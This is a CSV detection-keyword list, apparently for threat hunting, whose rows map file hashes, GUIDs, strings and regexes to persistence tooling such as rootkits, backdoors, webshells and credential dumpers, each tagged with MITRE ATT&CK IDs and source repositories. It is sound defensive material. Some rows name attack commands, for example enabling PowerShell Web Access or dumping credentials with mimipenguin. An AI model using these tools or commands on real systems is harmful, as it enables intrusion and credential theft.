"*da584a49609de5985f5ba64cfb215f0c30c93fac11563ea32afa3820b3327139*",".{0,1000}da584a49609de5985f5ba64cfb215f0c30c93fac11563ea32afa3820b3327139.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*DAMP-master.zip",".{0,1000}DAMP\-master\.zip","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","375","77","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z"
"*Data Name=""ServiceName"">procexp</Data>*",".{0,1000}Data\sName\=\""ServiceName\""\>procexp\<\/Data\>.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Persistence","https://github.com/trustedsec/The_Shelf","1","0","N/A","ServiceName","10","3","244","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z"
"*db192e3adff9cfb3777dc44fbe037aee648af60c203832d7a5f7ac41e265f01b*",".{0,1000}db192e3adff9cfb3777dc44fbe037aee648af60c203832d7a5f7ac41e265f01b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*db2c660c7cdfb86957e95790e3bef0a7ebf7fc1b1d7e48b14cbf70210ca87210*",".{0,1000}db2c660c7cdfb86957e95790e3bef0a7ebf7fc1b1d7e48b14cbf70210ca87210.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*db32aad6f38b4b0b38b65ba962eb9c256640324f01cef1d9e9eda4a32106a8a5*",".{0,1000}db32aad6f38b4b0b38b65ba962eb9c256640324f01cef1d9e9eda4a32106a8a5.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*dbbe29d4095a98dbfc4e2ef1a26e0696f75930a04a274a2a207c0bd0296b7a24*",".{0,1000}dbbe29d4095a98dbfc4e2ef1a26e0696f75930a04a274a2a207c0bd0296b7a24.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*dbeab309b7ecd219233a56c43b0c95f88a39c7d1d524d5f71d319a5928a2b5ad*",".{0,1000}dbeab309b7ecd219233a56c43b0c95f88a39c7d1d524d5f71d319a5928a2b5ad.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*dd9f9362f115314d3ba6b5eb8e49128fd5052e195a679caae0729640ef42d95f*",".{0,1000}dd9f9362f115314d3ba6b5eb8e49128fd5052e195a679caae0729640ef42d95f.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#filehash","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*ddf4573b4c5fdfd92657979d79b8d8c7658dbb36e9a794628438ff01d7cca1a5*",".{0,1000}ddf4573b4c5fdfd92657979d79b8d8c7658dbb36e9a794628438ff01d7cca1a5.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*de09af73cc55f3dfbf6bf40493075b3c93765aa0ad88e34b568eac727f6b0c03*",".{0,1000}de09af73cc55f3dfbf6bf40493075b3c93765aa0ad88e34b568eac727f6b0c03.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*de0be23b564e470725a91e72bf431667ab1d2d4e8cb318a1c18e66b3ba97340e*",".{0,1000}de0be23b564e470725a91e72bf431667ab1d2d4e8cb318a1c18e66b3ba97340e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*de961474a71ea2f05fd9e9d6b862397660ed559533534bffa03cf9f2f2b70dab*",".{0,1000}de961474a71ea2f05fd9e9d6b862397660ed559533534bffa03cf9f2f2b70dab.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*deepce.sh -e *",".{0,1000}deepce\.sh\s\-e\s.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*define BACKDOOR_PORT *",".{0,1000}define\sBACKDOOR_PORT\s.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","0","N/A","N/A","10","2","111","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z"
"*demonizedshell.sh*",".{0,1000}demonizedshell\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*demonizedshell_static.sh*",".{0,1000}demonizedshell_static\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*devine@cr0.net*",".{0,1000}devine\@cr0\.net.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#email #linux","N/A","10","6","551","127","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z"
"*discovery_port_scan*",".{0,1000}discovery_port_scan.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*dism  /online /enable-feature /featurename:IIS-WebServerRole /all*",".{0,1000}dism\s\s\/online\s\/enable\-feature\s\/featurename\:IIS\-WebServerRole\s\/all.{0,1000}","greyware_tool_keyword","powershell","enable the PowerShell Web Access featur which could be used for remote access and potential","T1548.002 - T1059.001","TA0003","N/A","N/A","Persistence","https://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf","1","0","N/A","sigma pr https://github.com/SigmaHQ/sigma/pull/4997/files","10","10","N/A","N/A","N/A","N/A"
"*dism  /online /enable-feature /featurename:WindowsPowerShellWebAccess /all*",".{0,1000}dism\s\s\/online\s\/enable\-feature\s\/featurename\:WindowsPowerShellWebAccess\s\/all.{0,1000}","greyware_tool_keyword","powershell","enable the PowerShell Web Access featur which could be used for remote access and potential","T1548.002 - T1059.001","TA0003","N/A","N/A","Persistence","https://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf","1","0","N/A","sigma pr https://github.com/SigmaHQ/sigma/pull/4997/files","10","10","N/A","N/A","N/A","N/A"
"*dism.exe*/enable-feature*WindowsPowerShellWebAccess *",".{0,1000}dism\.exe.{0,1000}\/enable\-feature.{0,1000}WindowsPowerShellWebAccess\s.{0,1000}","greyware_tool_keyword","powershell","enable the PowerShell Web Access featur which could be used for remote access and potential","T1548.002 - T1059.001","TA0003","N/A","N/A","Persistence","https://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf","1","0","N/A","sigma pr https://github.com/SigmaHQ/sigma/pull/4997/files","10","10","N/A","N/A","N/A","N/A"
"*Dive Shell - Emperor Hacking Team*",".{0,1000}Dive\sShell\s\-\sEmperor\sHacking\sTeam.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*djhohnstein/SharpSC*",".{0,1000}djhohnstein\/SharpSC.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","1","N/A","N/A","8","1","38","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z"
"*DoUCMe-main\*",".{0,1000}DoUCMe\-main\\.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z"
"*DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd*",".{0,1000}DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","360","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*dropbearconvert openssh dropbear*",".{0,1000}dropbearconvert\sopenssh\sdropbear.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","N/A","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*dropbearkey -t *",".{0,1000}dropbearkey\s\-t\s.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","N/A","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*dropbearkey -y -f *",".{0,1000}dropbearkey\s\-y\s\-f\s.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","N/A","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*drops a netcat?? undetectable by antivirus*",".{0,1000}drops\sa\snetcat\?\?\sundetectable\sby\santivirus.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*dumpcreds*mimipenguin*",".{0,1000}dumpcreds.{0,1000}mimipenguin.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*dynasty_rce/rce.php*",".{0,1000}dynasty_rce\/rce\.php.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*DynastyPersist-main.zip*",".{0,1000}DynastyPersist\-main\.zip.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*e01fee07234e35d11957d7ff65a5e2e7e0bac4a4ff061fd5b5d90a42701c1c49*",".{0,1000}e01fee07234e35d11957d7ff65a5e2e7e0bac4a4ff061fd5b5d90a42701c1c49.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*e05ef2747f973d6ae9e4bd5fbeede55b27afd44882b83b4aee79330e856757e8*",".{0,1000}e05ef2747f973d6ae9e4bd5fbeede55b27afd44882b83b4aee79330e856757e8.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*e0c9c27432a110f23a520ee1dad769a42f933062041df41cf88597fce97df008*",".{0,1000}e0c9c27432a110f23a520ee1dad769a42f933062041df41cf88597fce97df008.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*e2c267e1e289e975e1a4a2acf13f30eb04dbb4a4da24daae02c248dbb199e919*",".{0,1000}e2c267e1e289e975e1a4a2acf13f30eb04dbb4a4da24daae02c248dbb199e919.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*e2e3e51ea97a2c74d1b98618143d69acfcdbbabd0d33607cb475757e05fc6c4b*",".{0,1000}e2e3e51ea97a2c74d1b98618143d69acfcdbbabd0d33607cb475757e05fc6c4b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*e30443b3f19aafa06b3edb124228f6ac35aa51737c3eb78fa007ffdce9d75bc5*",".{0,1000}e30443b3f19aafa06b3edb124228f6ac35aa51737c3eb78fa007ffdce9d75bc5.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*E3104B33-DB3D-4C83-B393-1E05E1FF2B10*",".{0,1000}E3104B33\-DB3D\-4C83\-B393\-1E05E1FF2B10.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*e3b434dad7f4330a5402271014b6a450ecf998aa10d66c640798d5b1d057639a*",".{0,1000}e3b434dad7f4330a5402271014b6a450ecf998aa10d66c640798d5b1d057639a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*e3e2ced2569d1ebef8f65b554979747881e5e060355fa6698c913036dfd892ba*",".{0,1000}e3e2ced2569d1ebef8f65b554979747881e5e060355fa6698c913036dfd892ba.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#filehash","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*e443f79a4b00598ac5a5adc8826b605db24b6345ae1fb4180aa4f173152fffc0*",".{0,1000}e443f79a4b00598ac5a5adc8826b605db24b6345ae1fb4180aa4f173152fffc0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*e4f24bd9724afff4200cf4c57eeb2ba37b9bf99b7add53ce1262e2e98c80a812*",".{0,1000}e4f24bd9724afff4200cf4c57eeb2ba37b9bf99b7add53ce1262e2e98c80a812.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*E55F7214-8CC4-4E1D-AEDB-C908D23902A4*",".{0,1000}E55F7214\-8CC4\-4E1D\-AEDB\-C908D23902A4.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*E61C950E-A03D-40E2-AAD5-304C48570364*",".{0,1000}E61C950E\-A03D\-40E2\-AAD5\-304C48570364.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#GUIDproject","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*e75d251f639cc70aba21e621c2710dc3ee9dc15d1a677a157f83c14e9aff5f8e*",".{0,1000}e75d251f639cc70aba21e621c2710dc3ee9dc15d1a677a157f83c14e9aff5f8e.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#filehash","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"*e8eb686267d1017f0c044f8725a91d2a3b0111156975f4918c9b3839b571483f*",".{0,1000}e8eb686267d1017f0c044f8725a91d2a3b0111156975f4918c9b3839b571483f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8*",".{0,1000}e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","#filehash","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*E9F7C24C-879D-49F2-B9BF-2477DC28E2EE*",".{0,1000}E9F7C24C\-879D\-49F2\-B9BF\-2477DC28E2EE.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#GUIDproject","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*eaa6c3fcb9e722d690183ae349ac2ca935aa9bcd2942f6f103fd8eb842dc5168*",".{0,1000}eaa6c3fcb9e722d690183ae349ac2ca935aa9bcd2942f6f103fd8eb842dc5168.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*eaabe990e3dfa97bc3ffdd9f7369553597fb1686dbd91e164560ee476e1d6e79*",".{0,1000}eaabe990e3dfa97bc3ffdd9f7369553597fb1686dbd91e164560ee476e1d6e79.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*eae7c7548d28517d099afef1bc7664f098bfa3c533ee5a0cf763ab28480ebeeb*",".{0,1000}eae7c7548d28517d099afef1bc7664f098bfa3c533ee5a0cf763ab28480ebeeb.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*eb912ff679743d91907286544c7326df785a3a6e6992fa182404e3fbae52958a*",".{0,1000}eb912ff679743d91907286544c7326df785a3a6e6992fa182404e3fbae52958a.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#filehash","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*ebab27736848eb90409384d231b939702ce97482cc231aba7d0acf58e02db438*",".{0,1000}ebab27736848eb90409384d231b939702ce97482cc231aba7d0acf58e02db438.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*eca140e2de5725eeaa29ab48f86e1745ef0232aaafd04298eccb742e1241171b*",".{0,1000}eca140e2de5725eeaa29ab48f86e1745ef0232aaafd04298eccb742e1241171b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
